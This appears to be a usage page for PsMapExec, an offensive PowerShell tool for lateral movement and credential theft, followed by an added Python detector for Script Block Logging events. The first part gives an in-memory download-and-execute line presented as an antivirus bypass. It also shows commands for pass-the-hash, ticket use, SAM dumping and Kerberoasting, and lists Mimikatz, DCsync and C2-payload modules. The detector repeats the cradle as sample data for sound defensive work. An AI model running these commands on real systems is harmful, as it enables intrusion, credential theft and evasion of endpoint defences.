Starting with version 0.6.0, PsMapExec no longer has any external dependencies other than the Amnesiac module.
PsMapExec can now be run in restricted environments such as exam labs or CTF machines.
Loading the script into memory (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
Examples:
# Current user
PsMapExec -Targets All -Method [Method]
# With a password
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# With a hash
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# With a ticket
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Dump the SAM file
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Using modules
PsMapExec -Targets All -Method [Method] -Module [Module]
Currently supported methods (protocols):
- RDP
- SessionHunter
- SMB
- SMB Signing
- Spraying
- VNC
- WinRM
- WMI
- MSSQL
- Kerberoast
Implemented modules:
- Amnesiac - execution of Amnesiac C2 payloads
- ConsoleHistory - PowerShell console history
- Files - files in typical directories
- KerbDump - dump of Kerberos tickets
- eKeys - dump of keys (Mimikatz)
- LogonPasswords - dump of logon passwords (Mimikatz)
- LSA - dump of LSA (Mimikatz)
- NTDS - DCsync implementation
- SAM - dump of SAM
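The in-memory loading line, the usage examples and the module list above give a defender concrete patterns to look for in PowerShell Script Block Logging (Event ID 4104). The following is an added example, not part of the original page or of the PsMapExec project: a small Python detector that grades constructed ScriptBlockText samples by what they contain (download cradle, PsMapExec with -Hash/-Ticket, Kerberoast, credential-dumping modules). The sample log lines, the placeholder hash value and the rule names are all constructed for this example.

```python
import re
from dataclasses import dataclass

# Constructed ScriptBlockText samples as recorded by PowerShell Script Block
# Logging (Event ID 4104). The hash value is a placeholder, not real material.
SAMPLE_SCRIPT_BLOCKS = [
    'IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")',
    "PsMapExec -Targets All -Method SMB -Username svc_backup -Hash 0123456789abcdef0123456789abcdef -Module SAM",
    "PsMapExec -Method Kerberoast -ShowOutput",
    "Get-ChildItem C:\\Users | Select-Object Name",
]
# Modules from the list above that read credential material off the target.
CREDENTIAL_MODULES = {"sam", "lsa", "ntds", "logonpasswords", "ekeys", "kerbdump"}
# (rule name, severity, pattern). Rule names are ours, not PsMapExec's.
RULES = [
    ("download_cradle", "medium", re.compile(
        r"(IEX|Invoke-Expression)\s*\(?.*(Net\.WebClient|DownloadString)", re.I | re.S)),
    ("psmapexec_reference", "medium", re.compile(r"\bPsMapExec\b", re.I)),
    ("psmapexec_hash_or_ticket", "high", re.compile(r"\bPsMapExec\b.*\s-(Hash|Ticket)\b", re.I)),
    ("psmapexec_kerberoast", "high", re.compile(r"\bPsMapExec\b.*-Method\s+Kerberoast\b", re.I)),
]
SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}

@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str

def analyze(script_block: str) -> list[Finding]:
    """Return every rule that fires on one ScriptBlockText value."""
    findings = [Finding(name, sev) for name, sev, pat in RULES if pat.search(script_block)]
    # A PsMapExec run that names a credential-dumping module is the worst case.
    module = re.search(r"\bPsMapExec\b.*-Module\s+(\w+)", script_block, re.I)
    if module and module.group(1).lower() in CREDENTIAL_MODULES:
        findings.append(Finding("psmapexec_credential_dump", "critical"))
    return findings

def scan(blocks: list[str]) -> dict[str, str]:
    """Map each flagged block to its highest severity; clean blocks are omitted."""
    result = {}
    for block in blocks:
        hits = analyze(block)
        if hits:
            result[block] = max(hits, key=lambda f: SEVERITY_RANK[f.severity]).severity
    return result

if __name__ == "__main__":
    for block, severity in scan(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"[{severity.upper():8}] {block[:80]}")
```

In a real deployment the samples would come from the ScriptBlockText field of exported 4104 events; the same rules translate directly into a SIEM query or a Sigma rule.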